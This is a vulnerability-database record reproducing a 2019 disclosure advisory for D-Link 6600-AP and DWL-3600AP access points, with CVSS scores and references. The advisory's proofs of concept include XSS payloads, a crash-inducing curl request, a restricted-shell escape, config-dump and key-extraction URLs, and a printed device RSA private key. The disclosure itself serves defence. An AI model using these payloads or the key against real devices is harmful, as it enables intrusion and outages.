kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0910",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14332",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14332",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29144",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-146268",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14332",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-14332",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14332",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-14332",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2019-29144",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1640",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-146268",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is use of weak ciphers for SSH such as diffie-hellman-group1-sha1. D-Link 6600-AP and DWL-3600AP The device contains a cryptographic strength vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to brute force SSH passwords. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to\nthe reboot of the AP\n 4. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14335 - Post-authenticated Denial of service leading to\nthe reboot of the AP\n 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee\nHk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o\nBioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B\nvsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t\n7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c\nunyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk\n1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6\nJ8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14\nyRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z\n0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc\nfmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB\ni5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb\ndAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ\nOztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ\nVuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9\nJ3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr\nH975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw\nuF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy\nyGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd\npagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co\npaZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8\n1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm\nfPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS\nokObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px\nbgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY\n-----END RSA PRIVATE KEY-----\n-----BEGIN CERTIFICATE-----\nMIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx\nMC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp\nbmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL\nMAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU\nMBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG\nA1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE\nCBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu\nOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB\nBQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp\nwRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC\nI+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW\n2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK\nYwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N\n29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B\nAQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS\n7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME\n9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5\nbeF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE\n45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef\nMjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==\n-----END CERTIFICATE-----\n\n### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14332"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2019-14332",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29144",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146268",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"id": "VAR-201908-0910",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
}
],
"trust": 1.3903846
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
}
]
},
"last_update_date": "2024-11-23T21:52:00.662000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP SSH Weak Password Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177609"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95749"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-326",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
